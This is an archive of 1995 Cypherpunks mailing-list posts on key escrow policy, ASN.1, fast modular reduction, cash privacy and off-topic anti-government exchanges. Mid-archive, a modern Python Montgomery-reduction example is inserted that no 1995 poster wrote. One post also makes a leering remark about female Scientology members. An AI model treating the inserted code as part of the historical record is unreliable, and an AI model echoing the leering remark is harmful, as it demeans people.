>> >that the real threat to privacy is not the guvmint, but all of
>> >the yoyos with their little cam corders running around pointing them
>> >at people.
>> >
>> >Security cameras in ATMS and at airline ticket counters do more
>> >to threaten you privacy than do FIBBIE wiretaps, and PGP won't
>> >protect you from them. (and usually neither will the courts).
>>
>> I absolutely agree with this, though this doesn't mean I'll stop worrying
>> about the government's plans for key escrow (GAK), about limits on key
>> lengths, or about other efforts to thwart strong security.
>
>I, of course, know of the "dislike" of GAK here. I am curious to know,
>however, if the "dislike" is because government would have access under
>any circumstances or if the primary worry is that government will cheat
>and get access when most would agree that they shouldn't (either by the
>judge "cheating" or a TLA stealing it).
>
>In other words ... if it took agreement by a review board composed of
>non-LEA members of this list, would the escrow be acceptable??
>
>EBD
>

In my case, it's simply a matter of principle: the government has no right to know what I'm saying. Search warrants may allow them to get to "things" that I have, but the First and Fifth amendments make words sacred. If the government can eavesdrop on my conversation, then my speech is no longer free.

A review board consisting of cypherpunks has no more right to listen to my private conversations than does the FBI, so I would not agree to that proposal either.

--buford

From cme at TIS.COM  Thu Sep 7 16:09:15 1995
From: cme at TIS.COM (Carl Ellison)
Date: Thu, 7 Sep 95 16:09:15 PDT
Subject: ASN.1 and Kerberos version 5
In-Reply-To: <199509071800.LAA20586@comsec.com>
Message-ID: <9509072233.AA03587@tis.com>

>Date: Sat, 2 Sep 1995 13:55:38 -0400
>From: jis at mit.edu (Jeffrey I. Schiller)

>I'll say it. I was the person who pushed for the use of ASN.1 in Kerberos
>version 5. I had this disease at the time that made me think that ASN.1 was
>a good idea. I got better, unfortunately we have been living with the
>results of my braino for quite some time now... poor Ted.

Jeff,

I'm collecting lists of ASN.1 problems as well as better solutions. If you'd care to contribute.... Otherwise, I'll post the results when they're firmed up. I got some *great* material from Burt Kaliski at the P1363 meeting and that needs to be folded in, so I know it's not soup yet.

 - Carl

From weidai at eskimo.com  Thu Sep 7 16:47:38 1995
From: weidai at eskimo.com (Wei Dai)
Date: Thu, 7 Sep 95 16:47:38 PDT
Subject: fast modular reduction
In-Reply-To: <199509070811.EAA07559@clark.net>
Message-ID:

> Anyway, I played around with the algorithm a little, and it's neat
> and easy to implement, but the speed increase is not worth
> the patent hassle (assuming there is a speed increase, I saw none)
>
> The algorithm is still basically O(n^2) if used in a modexp
> routine. It requires n^2 multiplications and additions. Whereas,
> a typical Karatsuba multiplication using a high precision
> reciprocal will only use 2*n^1.5 multiplications and 5*n^1.5/8
> additions. (for n=64 which is a 2048-bit number being reduced,
> it's about 1/5 the multiplications, but 5 times the additions)

I agree with you that the patent hassle is probably not worth the speed increase. If I came up with the algorithm by myself and on my own time, I certainly would not have filed a patent for it, but that wasn't the case. I also agree that the patent system should be abolished, but there is nothing I can do about that either.

The speed increase does exist over Montgomery's modular reduction because it uses n*n multiplications and 1 division compared to n*(n+1) multiplications, and the pre- and post-calculations are much simpler. Division using Karatsuba multiplication does seem to have a better asymptote, but is probably slower for most practical lengths. Both Lenstra's LIP and Lacy's CryptLib use Montgomery for modular reduction.

The numbers you give are a bit off. Assuming a 32-bit machine, n=64 implies a 2048-bit modulus, and a 4096-bit number to be reduced. Also, Karatsuba should use 1/3 (2*64^1.58 / 64^2) the multiplications rather than 1/5.

Wei Dai

From hallam at w3.org  Thu Sep 7 17:14:46 1995
From: hallam at w3.org (hallam at w3.org)
Date: Thu, 7 Sep 95 17:14:46 PDT
Subject: GAK Hacks
In-Reply-To: <8921.9509071941@exe.dcs.exeter.ac.uk>
Message-ID: <9509080010.AA06896@zorch.w3.org>

>One of their requirements was resistance to static patches, as someone
>else pointed out that is just not possible in software, if someone gets
>really bored they can at worst disassemble the entire thing, and
>re-write it from scratch without any silly GAK stuff, or with a row of
>00s where the escrowed key goes.
I think I would prefer the escrowed key to a row of 00's; if someone wanted to decode the message they could just use the all-00's key :-)

Phill

From starrd at iia2.org Thu Sep 7 17:27:16 1995
From: starrd at iia2.org (starrd)
Date: Thu, 7 Sep 95 17:27:16 PDT
Subject: Collection of personal info
In-Reply-To:
Message-ID:

On Wed, 6 Sep 1995, Rob Lowry wrote:

> I am new to the crypto scene and still think PGP is neato ;)

Welcome, you will learn a lot of great material here, and yes it is neato. I just wish it came pre-installed with WinDoze...

||||||||||||email address: starrd at iia2.org or starrd at cinenet.net||||||||||| | Creator of the original | Get paid to upload | | Patriot's Archives \ shareware to BBSes and | | ftp: iia.org /pub/users/patriot \_____ the Internet! | | ftp: wuarchive.wustl.edu /pub/msdos_uploads/patriot\ Get file: | | For index of available files: descript.ion \ uploader.zip | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

From dr261 at cleveland.Freenet.Edu Thu Sep 7 17:32:47 1995
From: dr261 at cleveland.Freenet.Edu (Tobin T Fricke)
Date: Thu, 7 Sep 95 17:32:47 PDT
Subject: Collection of personal info
Message-ID: <199509080005.UAA26943@kanga.INS.CWRU.Edu>

> letting it happen, and using cash instead of credit, is the smart answer

I'm somewhat surprised at how much of an issue this is. The federal government prints up nice green paper for us to pay for things with.
It's anonymous (to a large extent), universally accepted (most of the time), fairly untraceable (unless you really want to), easily available, doesn't collect interest, free to use, etc. No one is forcing anyone to use credit cards, etc.. Then again, being a kid, I have never bought anything with anything other than cash on the spot...

--
Tobin Fricke (aka LightRay) The Digital Forest BBS (714)586-6142 dr261 at kanga.ins.cwru.edu KE6WHF Amateur Radio, 1:103/925 fido

From starrd at iia2.org Thu Sep 7 17:33:13 1995
From: starrd at iia2.org (starrd)
Date: Thu, 7 Sep 95 17:33:13 PDT
Subject: ON OFF-TOPIC
In-Reply-To: <199509070639.BAA00416@mail.socketis.net>
Message-ID:

On Wed, 6 Sep 1995, Gary Jeffers wrote:

> Date: Wed, 06 Sep 1995 22:42:42 -0500
> From: Gary Jeffers
> To: cypherpunks at toad.com
> Subject: ON OFF-TOPIC
>
> ON OFF-TOPIC
>
> THE UNITED STATES "FEDERAL" GOVERNMENT HAS NO LEGITIMACY!
>
> CRYPTO CODERS SUPPLY THE MEANS!
> CONSPIRACY THEORISTS SUPPLY THE MOTIVATION!
>
> conspiracy theorist = alternative political theorist
> NOT= AP/ABC/CBS/NBC/CIA/FBI/U.S GOV'N./New York Times/Washington Post opinion moulders syndicate
>
> "extremist right-wing kook" = old fashioned American patriot
> Left term used often by left-wing extremist liberal statist kooks.
>
> The United States "Federal" Government - we'll be even more American without it.
>
> PUSH EM BACK! PUSH EM BACK!
> WWWAAAYYYY BBBAAACCCK!
> BBBEEEAAATTTT STATE!
>

So true my friend, I have been saying this for years. Glad to find another patriot here. BTW, I love your cheer!
From starrd at iia2.org Thu Sep 7 17:41:47 1995
From: starrd at iia2.org (starrd)
Date: Thu, 7 Sep 95 17:41:47 PDT
Subject: ON OFF-TOPIC
In-Reply-To: <199509070834.EAA04213@frankenstein.piermont.com>
Message-ID:

On Thu, 7 Sep 1995, Perry E. Metzger wrote:

> Was this really needed?

Yes, it is my bet that there are some patriots in this list. The desire to protect one's privacy is a very "patriot" thing to want to do. CyPherpunks appears to be a lot of people who are against big brother government, and quite probably for restoring the constitution...am I right?

> Gary Jeffers writes:
> > ON OFF-TOPIC
> >
> > THE UNITED STATES "FEDERAL" GOVERNMENT HAS NO LEGITIMACY!
>
From mnorton at cavern.uark.edu Thu Sep 7 17:42:17 1995
From: mnorton at cavern.uark.edu (Mac Norton)
Date: Thu, 7 Sep 95 17:42:17 PDT
Subject: Collection of personal info
In-Reply-To:
Message-ID:

a somewhat similar system does exist, also under federal statute, for credit reporting agencies. YMMV

MacN

On Wed, 6 Sep 1995, Rob Lowry wrote:

> > Nor was I suggesting a legal solution (I know your comment was triggered by Rob's request for legal recourse) but instead suggesting that things are farther along than some people realize.
>
> Nor do I support additional rules/laws or regulations.. but if there are existing ones to screw with, use 'em..
> Recently I had a bill turned over to collections from, of all places, the daycare we used to take our kids to.. we owe them about $1300 in their estimation. The reason we have not paid is due to 11 days of lost work due to head lice that they provided to my kids, plus they stopped serving breakfast which was in the contract we signed when enrolling the kids there.. I was notified by the collection co. about this submittal (now $1500 for some reason..) and by law, I can dispute this in writing, thus slowing the wheels of the collection monster horribly. I did so..
> and for the last 4 months, they have been trying to prove I owe money.. I was asking if such a system exists for the release of your credit info.. and it appears that there is no safety mechanism in that monster. Rather than cry out for more laws to be twisted against us later, I agree that letting it happen, and using cash instead of credit, is the smart answer here.
>
> Someone care to point me at e-cash info? sounds interesting.. remember, I am new to the crypto scene and still think PGP is neato ;)
>

From rjc at clark.net Thu Sep 7 17:49:09 1995
From: rjc at clark.net (Ray Cromwell)
Date: Thu, 7 Sep 95 17:49:09 PDT
Subject: fast modular reduction
In-Reply-To:
Message-ID: <199509080048.UAA19561@clark.net>

> The numbers you give are a bit off. Assuming a 32-bit machine, n=64 implies a 2048-bit modulus, and a 4096-bit number to be reduced. Also, Karatsuba should use 1/3 (2*64^1.58 / 64^2) the multiplications rather than 1/5.

The n=64 implies two 2048-bit numbers are being multiplied. The 2048-bit number comes from the fact that in a typical crypto app, modexp will be reducing numbers as large as the modulus squared which runs 2048-bits for a 1024-bit modulus. The reciprocal is 1 block bigger than the number to be reduced. Hence, you are dealing with multiplying about two 2048-bit numbers. But since we only care about the "fractional" part of the result, we can safely throw away half the computation and only compute half the Karatsuba recursion tree. (the number before the decimal point is the quotient) Then, to determine the final remainder, we simply multiply by the modulus again, throwing away non-significant computation again. There is a normal n^2 method for reducing via reciprocal that only uses 1/4 the number of ops as the obvious technique.

You're right about the 1/3 vs 1/5, I dunno where the 5 came from, must have been a typo in my calcs.

The problem with Karatsuba is that it's hard to implement efficiently.
Temporary ints should be kept to a minimum and be preallocated. The combine step requires 1 store, and 5 additions, of multiprecision integers. The split step requires no copying if you use pointer manipulation, and instead of shifting, don't add in place, but add "with shift" to the destination. Most of the implementations I've seen do too much copying and shifting. Given that some modern processors have efficient hardware multiply, it might not be worth all the trouble to trade mults for adds. If a processor has an efficient hardware FFT, it might even be worthwhile to use the FFT multiply method.

Do you have a ref for the Montgomery method? I'm unfamiliar with the name, I wonder if it's something I've seen before under a different label.

Check out Schonhage's book "Fast Algorithms". They've implemented all the asymptotic algorithms efficiently and gathered performance data. I corresponded with Schonhage's grad student and he told me that Karatsuba wins for n>=8, which I find difficult to see, when it takes about n=32 for my own implementation (not optimized) to break even.

-Ray

From tcmay at got.net Thu Sep 7 17:50:22 1995
From: tcmay at got.net (Timothy C. May)
Date: Thu, 7 Sep 95 17:50:22 PDT
Subject: Notes from NIS&T Key Escrow Export conference.
Message-ID:

At 7:59 PM 9/7/95, Pat Farrell wrote:

> > "If keys are escrowed, what purpose does a 64 bit limit serve?"
>
> This question was asked, it seems like a zillion times, but probably no more than four or five times.
>
> It is a bit of a belt and suspenders idea. But it also shows how scared they are about real encryption.
>
> It is clear that this meeting is a shame. Everyone in industry
                                     ^^^^^

Sham? Or shame? Or, likely, both?

Your account of the meeting merely confirms my worst fears. But don't they say the Chinese character for "crisis" also means "opportunity"? (Sort of the way the English word "oversight" has two very different and opposite meanings.)
--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway."

From jya at pipeline.com Thu Sep 7 17:55:55 1995
From: jya at pipeline.com (John Young)
Date: Thu, 7 Sep 95 17:55:55 PDT
Subject: Key Escrow Papers
Message-ID: <199509080055.UAA27687@pipe4.nyc.pipeline.com>

We have scanned several of the handouts at the NIST Key Escrow Issues Meeting of September 6 (not present Sept 7). Perhaps someone, Pat Farrell or another, would be willing to make them available on a homepage or ftp site. If so we will send them over. If nobody volunteers we will send them by our puny e-mail contraption.

Here's what we have ready to send:

1. The outlines of meeting topics of Raymond Kammer of NIST and Michael Nelson of the White House. (7kb)
2. Discussion Paper No. 4, "Example Potential Solutions for the Draft Export Criteria for Software Key Escrow Encryption," which offers example solutions for each of the ten criteria. (7kb)
3. The Business Software Alliance's dissenting blast at the government's key escrow proposal and export limit. This paper was loudly applauded. (19kb)
4. Trusted Information Systems' "Thoughts on the NIST Escrow Issues Meeting Discussion Papers." (27kb in 2 parts)
5. TECSEC Incorporated's "Private Escrow Key Management: A Method and its Issues." (13kb)
6. Dorothy Denning's "Comments on Draft Criteria for Software Key Escrow Exportability" and "Comments on Issues for Key Escrow Agents." (8kb)

Two other papers will be scanned later:

7. National Semiconductor's "Commercial Cryptography Ideas for Success" (9 pp.
of large type) This contains graphics of the CAKE program and a "Proposed NIST Escrow Certificate Hierarchy" which cannot be easily distributed by us, so we offer this by fax.
8. TECSEC's "The Merger of Technology and Cryptographic Key Management" (6 pp.).

Note 1: It was Michael Nelson of the White House who said that the reason to maintain the 64-bit limit for export was because the key escrow methodology had not yet been proven reliable and that the security agencies insisted on the relatively weak system in case key escrow failed.

Note 2: At the B-2 breakout session there was strong debate on a proposal for a "Criteria Zero": Before addressing any of the details of Criteria 3, 4 and 9 as presented to us, Group B-2 registers its view that export under general license of strong encryption should not require key escrow. A vote on the proposal was 7 yes, 7 no and 13 abstentions. It was not reported to the plenary session.

From perry at piermont.com Thu Sep 7 17:57:56 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Thu, 7 Sep 95 17:57:56 PDT
Subject: ON OFF-TOPIC
In-Reply-To:
Message-ID: <199509080057.UAA05313@frankenstein.piermont.com>

starrd writes:
> On Thu, 7 Sep 1995, Perry E. Metzger wrote:
>
> > Was this really needed?
>
> Yes, it is my bet that there are some patriots in this list.

Pardon, but I don't care. There are also several socialists on this list. Shall I help them out by posting a long tract on the labor theory of value? There are several religious christians here. Shall we begin to discuss the divinity of Jesus? There are also some Jews here -- we could have a bunch of religious debates, and the atheists could kick in some mud, too. There are lots of folks here who wear shoes -- perhaps we could discuss the merits of different brands.

> The desire to protect one's privacy is a very "patriot" thing to want to do.

But this isn't a list for "patriot"s.
> CyPherpunks appears to be a lot of people who are against big brother government, and quite probably for restoring the constitution...am I right?

Cypherpunks is a list for people interested in cryptography and its impact on privacy, law, society, etc. It is not a list for people to discuss libertarianism, socialism, constitutionalism, whether the president has just flown over your ranch in a black helicopter, whether the CIA was responsible for brainwashing your pet rat Algernon, whether David Koresh was the messiah, or how many members of the Federal Protective Service it takes to change a paper shredder.

There are lots of places to discuss these topics on the net. There is only Cypherpunks for discussing the overall impact of cryptography on society, and this is a fairly good place to discuss crypto algorithms and the like because it is (amazingly) fairly high s/n compared to, say, sci.crypt. Please help out by not polluting one of the few places to discuss these issues with stuff you can talk about anywhere.

Perry

From starrd at iia2.org Thu Sep 7 17:58:43 1995
From: starrd at iia2.org (starrd)
Date: Thu, 7 Sep 95 17:58:43 PDT
Subject: Scientology and police visit XS4ALL Amsterdam
In-Reply-To: <199509070600.QAA11675@molly.cs.monash.edu.au>
Message-ID:

On Thu, 7 Sep 1995, Jiri Baum wrote:

> >: : >>: OT7-48
> >: : >>: 1. Find some plants, trees, etc., and communicate to them individually until you know they received your communication.
> >: : >>: 2. Go to a zoo or a place with many types of life and communicate with each of them until you know the communication is received and, if possible, returned.
>

I gotta read more of this drivel! ROTFL! ROTFL!!! No wonder they don't want it out! They look like they belong in the funny-farm....Have you ever seen those cute uniforms they wear? [really!
Hollywood California, I have *been* to their "church"] especially the girls, reminds me of school-uniforms, but they are all so grown up [yum!] but with the minds of a moron....[see above drivel they read] I know this is somewhat off-topic, but I just *had* to say it!

From ghio at c2.org Thu Sep 7 18:02:47 1995
From: ghio at c2.org (Matthew Ghio)
Date: Thu, 7 Sep 95 18:02:47 PDT
Subject: Commercial Speech over Internet product
In-Reply-To: <9508078105.AA810503582@snail.rsa.com>
Message-ID:

> Here's an article about a commercial company that is doing speech over the Internet. Maybe someone would like to help them add encryption.
> --Bob Baldwin, speaking for myself only.

The program is a sound-listening extension for web-browsers. There is really no use for crypto because it's only processing information which is already public.
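Returning to the fast modular reduction thread above: Ray asks for a reference for the Montgomery method, and Wei Dai quotes its cost as n*(n+1) word multiplications. The following added example (not code from either poster) is a word-level Montgomery reduction (REDC) with a multiply counter, plus the square-and-multiply loop a modexp routine would wrap around it; it assumes 32-bit words, an odd n-word modulus m, and R = 2^(32n).

```python
"""Word-level Montgomery reduction with a single-precision multiply counter.

Added example for the fast modular reduction thread; not code from Wei Dai
or Ray Cromwell.  Assumes 32-bit words (the "32-bit machine" of the thread)
and an odd modulus m of exactly n words, so R = 2**(32*n).
"""

WORD_BITS = 32
BASE = 1 << WORD_BITS
MASK = BASE - 1


def to_words(x, n):
    """Little-endian word decomposition, padded to n words."""
    return [(x >> (WORD_BITS * i)) & MASK for i in range(n)]


def from_words(words):
    return sum(w << (WORD_BITS * i) for i, w in enumerate(words))


def montgomery_setup(m):
    """Precompute m' = -m^{-1} mod BASE.  Only the low word of m is needed."""
    m0 = m & MASK
    assert m0 & 1, "Montgomery reduction needs an odd modulus"
    return (-pow(m0, -1, BASE)) % BASE


def montgomery_reduce(t, m, n, m_prime):
    """REDC: return (t * R^{-1} mod m, word multiplications used).

    Requires 0 <= t < m * R.  Each of the n iterations does one multiply
    to get u_i and n multiplies for u_i * m, hence n * (n + 1) in total,
    the count quoted for Montgomery in the thread.
    """
    r_bits = WORD_BITS * n
    assert 0 <= t < (m << r_bits), "t must be below m * R"
    m_words = to_words(m, n)
    acc = to_words(t, 2 * n + 1)      # one spare word for the carry-out
    mults = 0
    for i in range(n):
        u = (acc[i] * m_prime) & MASK  # chosen so word i of acc becomes zero
        mults += 1
        carry = 0
        for j in range(n):
            prod = acc[i + j] + u * m_words[j] + carry
            mults += 1
            acc[i + j] = prod & MASK
            carry = prod >> WORD_BITS
        k = i + n                      # ripple the carry upward
        while carry:
            prod = acc[k] + carry
            acc[k] = prod & MASK
            carry = prod >> WORD_BITS
            k += 1
    result = from_words(acc[n:])       # low n words are zero: this is A / R
    if result >= m:                    # result < 2m, so one conditional subtract
        result -= m
    return result, mults


def check_reduction(t, m, n):
    """Compare REDC against the definition t * R^{-1} mod m.

    Returns (is_correct, word_multiplications)."""
    r = 1 << (WORD_BITS * n)
    got, mults = montgomery_reduce(t, m, n, montgomery_setup(m))
    expected = (t * pow(r, -1, m)) % m
    return got == expected, mults


def montgomery_modexp(base, exp, m, n):
    """Square-and-multiply entirely in Montgomery form, as a modexp routine
    would use REDC.  Returns (base**exp mod m, REDC word multiplications).
    The big-int products acc*acc and acc*x are left to Python and not counted."""
    r = 1 << (WORD_BITS * n)
    m_prime = montgomery_setup(m)
    one_m = r % m                       # Montgomery form of 1
    x = (base % m) * r % m              # Montgomery form of base: the one real division
    acc, mults = one_m, 0
    for bit in bin(exp)[2:]:
        acc, c = montgomery_reduce(acc * acc, m, n, m_prime)
        mults += c
        if bit == "1":
            acc, c = montgomery_reduce(acc * x, m, n, m_prime)
            mults += c
    result, c = montgomery_reduce(acc, m, n, m_prime)  # leave Montgomery form
    return result, mults + c


if __name__ == "__main__":
    # Constructed sample: the 127-bit Mersenne prime fits in n = 4 words.
    M, N = (1 << 127) - 1, 4
    ok, count = check_reduction(0xDEADBEEF << 100, M, N)
    print("REDC correct:", ok, "word multiplies:", count, "= n*(n+1) =", N * (N + 1))
    value, count = montgomery_modexp(3, 65537, M, N)
    print("3^65537 mod M matches pow():", value == pow(3, 65537, M), "REDC multiplies:", count)
```

Each REDC call costs exactly n*(n+1) word multiplies regardless of the input, which is why the thread describes the whole modexp as still O(n^2) per reduction step.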
From starrd at iia2.org Thu Sep 7 18:09:02 1995
From: starrd at iia2.org (starrd)
Date: Thu, 7 Sep 95 18:09:02 PDT
Subject: ON OFF-TOPIC
In-Reply-To: <199509080057.UAA05313@frankenstein.piermont.com>
Message-ID:

On Thu, 7 Sep 1995, Perry E. Metzger wrote:

> Date: Thu, 07 Sep 1995 20:57:32 -0400
> From: Perry E. Metzger
> To: starrd
> Cc: cypherpunks at toad.com
> Subject: Re: ON OFF-TOPIC
>
> starrd writes:
> > On Thu, 7 Sep 1995, Perry E. Metzger wrote:
> >
> > > Was this really needed?
> >
> > Yes, it is my bet that there are some patriots in this list.
>
> Pardon, but I don't care. There are also several socialists on this list. Shall I help them out by posting a long tract on the labor theory of value? There are several religious christians here. Shall we begin to discuss the divinity of Jesus? There are also some Jews here -- we could have a bunch of religious debates, and the atheists could kick in some mud, too. There are lots of folks here who wear shoes -- perhaps we could discuss the merits of different brands.
>

Nope. but the patriots & the cyPHerpunks share a common goal, and belief that it is none of the government's business what we think or want to share with our computers.

> > The desire to protect one's privacy is a very "patriot" thing to want to do.
>
> But this isn't a list for "patriot"s.

Yes it is. This list is for anyone who wants to preserve their privacy, but I do understand what you really meant. :-^)

> > CyPherpunks appears to be a lot of people who are against big brother government, and quite probably for restoring the constitution...am I right?
>
> Cypherpunks is a list for people interested in cryptography and its impact on privacy, law, society, etc.
> It is not a list for people to discuss libertarianism, socialism, constitutionalism, whether the president has just flown over your ranch in a black helicopter, whether the CIA was responsible for brainwashing your pet rat Algernon, whether David Koresh was the messiah, or how many members of the Federal Protective Service it takes to change a paper shredder.

Agreed

> There are lots of places to discuss these topics on the net. There is only Cypherpunks for discussing the overall impact of cryptography on society, and this is a fairly good place to discuss crypto algorithms and the like because it is (amazingly) fairly high s/n compared to, say, sci.crypt. Please help out by not polluting one of the few places to discuss these issues with stuff you can talk about anywhere.

Again, I agree with you Perry. In fact on a crypto-note [is that a word?] I would enjoy some discussion on SecDrv 1.4....anyone wanna talk about it v. PGP? [is it as secure as PGP?]
From tcmay at got.net Thu Sep 7 18:09:40 1995
From: tcmay at got.net (Timothy C. May)
Date: Thu, 7 Sep 95 18:09:40 PDT
Subject: Legality of Cash Transactions
Message-ID:

At 12:05 AM 9/8/95, Tobin T Fricke wrote:

> > letting it happen, and using cash instead of credit, is the smart answer
>
> I'm somewhat surprised at how much of an issue this is. The federal government prints up nice green paper for us to pay for things with. It's anonymous (to a large extent), universally accepted (most of the time), fairly untraceable (unless you really want to), easily available, doesn't collect interest, free to use, etc. No one is forcing anyone to use credit cards, etc.. Then again, being a kid, I have never bought anything with anything other than cash on the spot...

I agree with what I think your sentiment is, but bear in mind that "cash transactions" are in fact limited by various laws and regulations about reporting cash payments. Try buying a car with cash, especially a car costing over $10,000. Black Unicorn posted an account a while back (sometime last year) of his efforts to pay cash for a new car.

The restrictions on cash are mostly oriented toward ostensibly stopping "drug profits" from being used to buy expensive items.
The usual cash figure that invokes special laws is $10,000, with "structuring" of sub-$10K cash transfers an additional issue.

I foresee more restrictions coming, not fewer. Several of us have written extensively on this subject.

--Tim May

From pfarrell at netcom.com Thu Sep 7 18:18:20 1995
From: pfarrell at netcom.com (Pat Farrell)
Date: Thu, 7 Sep 95 18:18:20 PDT
Subject: Notes from NIS&T Key Escrow Export conference.
Message-ID: <76629.pfarrell@netcom.com>

"Peter Trei" writes:
> I think we can infer from this that the USG has, or soon expects to have, the ability to brute 64 bits of key.

That is what I heard (implied) too. If not today, in a reasonably foreseeable future. Remember, this is not an issue today, only weirdos such as the c'punks care today. The govies move slowly. They are setting the stage for tomorrow.

> > It is clear that this meeting is a shame. Everyone in industry
> A shame certainly, but I suspect you meant 'sham' (not a spelling flame, the difference in meaning is important).

Sorry for the typo, yes, I meant sham, fake, theater, all smoke and mirrors, nothing sincere, etc. See reference to "stage" above. All typos are mine.

Pat

Pat Farrell Grad Student http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage #include

From sdw at lig.net Thu Sep 7 18:49:37 1995
From: sdw at lig.net (Stephen D.
Williams)
Date: Thu, 7 Sep 95 18:49:37 PDT
Subject: Commercial Speech over Internet product
In-Reply-To:
Message-ID:

> > Here's an article about a commercial company that is doing speech over the Internet. Maybe someone would like to help them add encryption.
> > --Bob Baldwin, speaking for myself only.
>
> The program is a sound-listening extension for web-browsers. There is really no use for crypto because it's only processing information which is already public.

That's not necessarily true: I could set up a web server to only listen to a socket that a local ssh socket proxy could connect to. Restrict the ssh session for a particular key to only allow connection to that one socket. Then the connecting party would need ssh running with socket proxy near(er) their client system and the public key.

Assuming that you have a Unix workstation with audio listening software or a nearby PC it would be easy to set up. Internet/Web accessible RSA protected, session encrypted voice mail.

Now if someone would just port ssh to the PC as a selective Winsock wedge... (I'd love an example of Winsock wedge code (A la Surfwatch)!!!) I have a neighbor that develops one of the commercial TCP/IP stacks, so it's quite possible I could convince him to help.

With things like ssh, it's already very easy to create secure tunnels. It wouldn't be too tough to modify a proxy to use ssh style connections if an initial connection was found to be encrypted (or a key was cached for a URL).

Of course, IPsec is coming...

sdw
--
Stephen D.
Williams 25Feb1965 VW,OH (FBI ID) sdw at lig.net http://www.lig.net/sdw Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011 OO/Unix/Comm/NN ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95

From doug at Eng.Auburn.EDU Thu Sep 7 19:05:07 1995
From: doug at Eng.Auburn.EDU (Doug Hughes)
Date: Thu, 7 Sep 95 19:05:07 PDT
Subject: Notes from NIS&T Key Escrow Export conference.
In-Reply-To: <76629.pfarrell@netcom.com>
Message-ID:

On Thu, 7 Sep 1995, Pat Farrell wrote:

> > > It is clear that this meeting is a shame. Everyone in industry
> > A shame certainly, but I suspect you meant 'sham' (not a spelling flame, the difference in meaning is important).
>
> Sorry for the typo, yes, I meant sham, fake, theater, all smoke and mirrors, nothing sincere, etc. See reference to "stage" above.
>

In this context, I think burlesque fits remarkably well. ;) (Brings to mind a bunch of cross-dressers doing big theatre numbers in exotic costumes)

____________________________________________________________________________
Doug Hughes Engineering Network Services System/Net Admin Auburn University doug at eng.auburn.edu Apple T-shirt on Win95 - "Been there, done that"

From unicorn at polaris.mindport.net Thu Sep 7 19:12:32 1995
From: unicorn at polaris.mindport.net (Black Unicorn)
Date: Thu, 7 Sep 95 19:12:32 PDT
Subject: cryptography eliminates lawyers?
In-Reply-To:
Message-ID:

On Thu, 7 Sep 1995, Duncan Frissell wrote:

> On Wed, 6 Sep 1995, Buford Terrell wrote:
>
> > How could crypto put lawyers out of business? People would still have disagreements; plans would still go wrong; cars would still crash. More important, transactions would still need to be structured to carry out the desires of the parties while minimizing risks.
> >
> > Good communications technology, including crypto, could make lawyering more efficient, but I suspect the savings would be minimal.
>
> Well, if crypto reduces the role of government in human affairs, it will reduce work for lawyers.

This first, I see....

> Telecoms will certainly break the professional monopoly of lawyers (and other professionals).

This I don't. How do you mean exactly?

> DCF
>

From hallam at w3.org Thu Sep 7 19:17:10 1995
From: hallam at w3.org (hallam at w3.org)
Date: Thu, 7 Sep 95 19:17:10 PDT
Subject: ON OFF-TOPIC
In-Reply-To:
Message-ID: <9509080216.AA07325@zorch.w3.org>

> Nope. but the patriots & the cyPHerpunks share a common goal, and belief that it is none of the government's business what we think or want to share with our computers.

Poor you, the only major political party to come out with a pro crypto statement is a socialist party. The problem is currently with the right wing, right wing democrats such as Clinton and practically all the Republicans.

Crypto is outside the left right debate which centers on economic goals, whether to help the poor or the rich. The crypto debate is on the authoritarian/libertarian axis which is orthogonal. George Orwell was a socialist, John Stuart Mill a Liberal, both had very anti-authoritarian views which used to be known as libertarian.

If you want a debate on how to convince the authoritarians then perhaps you will get some interest. Trying to make crypto control out to be a left/right or pro/anti gun control issue is no more relevant than the pro/anti abortion debate.

Phill

From robl at on-ramp.ior.com Thu Sep 7 19:33:40 1995
From: robl at on-ramp.ior.com (Rob L)
Date: Thu, 7 Sep 95 19:33:40 PDT
Subject: Collection of personal info
In-Reply-To:
Message-ID:

> Welcome, you will learn a lot of great material here, and yes it is neato. I just wish it came pre-installed with WinDoze...
Don't worry, as soon as it becomes politically correct, and MS can find a way to make $$ on it, it will be rammed down our throats in WinDoze.. :)

From robl at on-ramp.ior.com Thu Sep 7 19:40:22 1995
From: robl at on-ramp.ior.com (Rob L)
Date: Thu, 7 Sep 95 19:40:22 PDT
Subject: ON OFF-TOPIC
In-Reply-To:
Message-ID:

> > Was this really needed?
>
> Yes, it is my bet that there are some patriots in this list. The desire to protect one's privacy is a very "patriot" thing to want to do. CyPherpunks appears to be a lot of people who are against big brother government, and quite probably for restoring the constitution...am I right?

I am one as well.. being pro-2nd amendment, and pro-1st.. and learning lots about the fight to protect them. Unlike some of the non-US readers in this list, I can see the clear connection between the 1st and 2nd amendment attacks.. if one falls, the other does as well. Both are slowly being whittled away to nothing (i.e. you can have only certain 'assault-style' guns, and you can only be guaranteed certain types of free speech)

RobL

From pfarrell at netcom.com Thu Sep 7 19:52:19 1995
From: pfarrell at netcom.com (Pat Farrell)
Date: Thu, 7 Sep 95 19:52:19 PDT
Subject: Key Escrow Papers
Message-ID: <81288.pfarrell@netcom.com>

John Young writes:
> Perhaps someone, Pat Farrell or another, would be willing to make them available on a homepage or ftp site. If so we will send them over.

I will gladly put up any nist-meeting papers, comments, drafts, etc. on my webpage. Please send them to me. (pfarrell at netcom.com) I am even willing to type in some, but that is known to cause typos, as I can't type, and even spellcheckers can't tell real words such as 'sham' from 'shame'

Right now, I'm pretty down on the two days, but let's keep the information flowing.

Pat

Pat Farrell Grad Student http://www.isse.gmu.edu/students/pfarrell
Info.
